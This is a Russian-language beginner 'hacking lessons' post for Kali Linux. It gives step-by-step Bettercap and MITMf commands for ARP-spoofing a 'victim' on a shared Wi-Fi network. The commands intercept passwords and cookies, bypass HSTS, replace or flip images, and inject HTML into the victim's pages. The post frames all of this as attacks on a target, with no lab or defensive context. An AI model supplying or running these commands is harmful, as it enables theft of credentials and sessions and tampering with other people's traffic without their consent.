Kali Linux: Уроки взлома.

Научу вас элементарным взломам при помощи утилит Bettercap и MITMf. 

Попрошу кулхацкеров не писать "давно уже знал это" или "баян".

Статья написана для новичков.

Чтобы все это проделать надо быть подключенным к вайфаю жертвы.

Перехват паролей и куки:

Bettercap 

Bettercap - набор инструментов для проведения тестов на безопасность в сети. 

И так, приступим, для этого нам понадобится Kali Linux и утилита под названием Bettercap. 

Для начала нам нужно узнать IP роутера, для этого откроем терминал и запишем вот эту команду.

route -n 

Получив адрес роутера нам нужно узнать адрес жертвы... 

nmap -sP 192.168.1.1/24 

Дальше, вводим собственно и саму команду для перехвата печенек и паролей... 

bettercap —interface eth0 —gateway 192.168.1.1 —target IP ЖЕРТВЫ -X 

Поздравляю, перехват куки и паролей начался. 

MITMf 

Второй способ перехватить куки, это при помощи утилиты MITMf. 

MITMf — это фреймворк для атак человек-посередине (Man-In-The-Middle attacks). Этот инструмент основывается на sergio-proxy и является попыткой возродить и обновить этот проект. 

Цель MITMf — быть инструментом всё-в-одном для сетевых атак и атак человек-по-середине, при этом обновляя и усовершенствую существующие атаки и техники. 

Давайте установим MITMf... 

sudo apt-get install mitmf mitmflib 

Для перехвата куки вводим команду... 

mitmf -i eth0 —spoof —arp —hsts —gateway IP РОУТЕРА — target IP ЖЕРТВЫ —ferretng 

Перехват начался.

Как перевернуть картинку на 180 / Как заменить картинку:

Что бы перевернуть картинку на 180 градусов, мы будем использовать все тот же MITMf. 

Как узнать IP роутера и жертвы вы уже знаете, так что приступим сразу к команде. 

Вводим.

mitmf -i eth0 —spoof —arp —hsts —gateway IP РОУТЕРА —target IP ЖЕРТВЫ —upsidedownternet 

Как заменить изображение? 

Вводим.

mitmf -i eth0 —spoof —arp —gateway IP РОУТЕРА —target IP ЖЕРТВЫ —imgrand —img-dir ПУТЬ К ПАПКЕ С КАРТИНКОЙ.

Инжект в HTML:

Для начала нам нужно создать html файл с кодом. 

Давайте для примера создадим черную страницу с красным текстом. 

HTML: 

<html> 

<body bgcolor="red"> 

<p><font size="15" color="red">BHF.io</font></p> 

</body> 

</html> 

Сохраним этот файл, и в консоли пишем команду для инжекта.

mitmf -i eth0 —spoof —arp —hsts —gateway IP РОУТЕРА —target IP ЖЕРТВЫ —inject —html-file 'ПУТЬ К ФАЙЛУ /index.html' 

Если постараться, то можно реализовать все это на обычном смартфоне на базе андроид.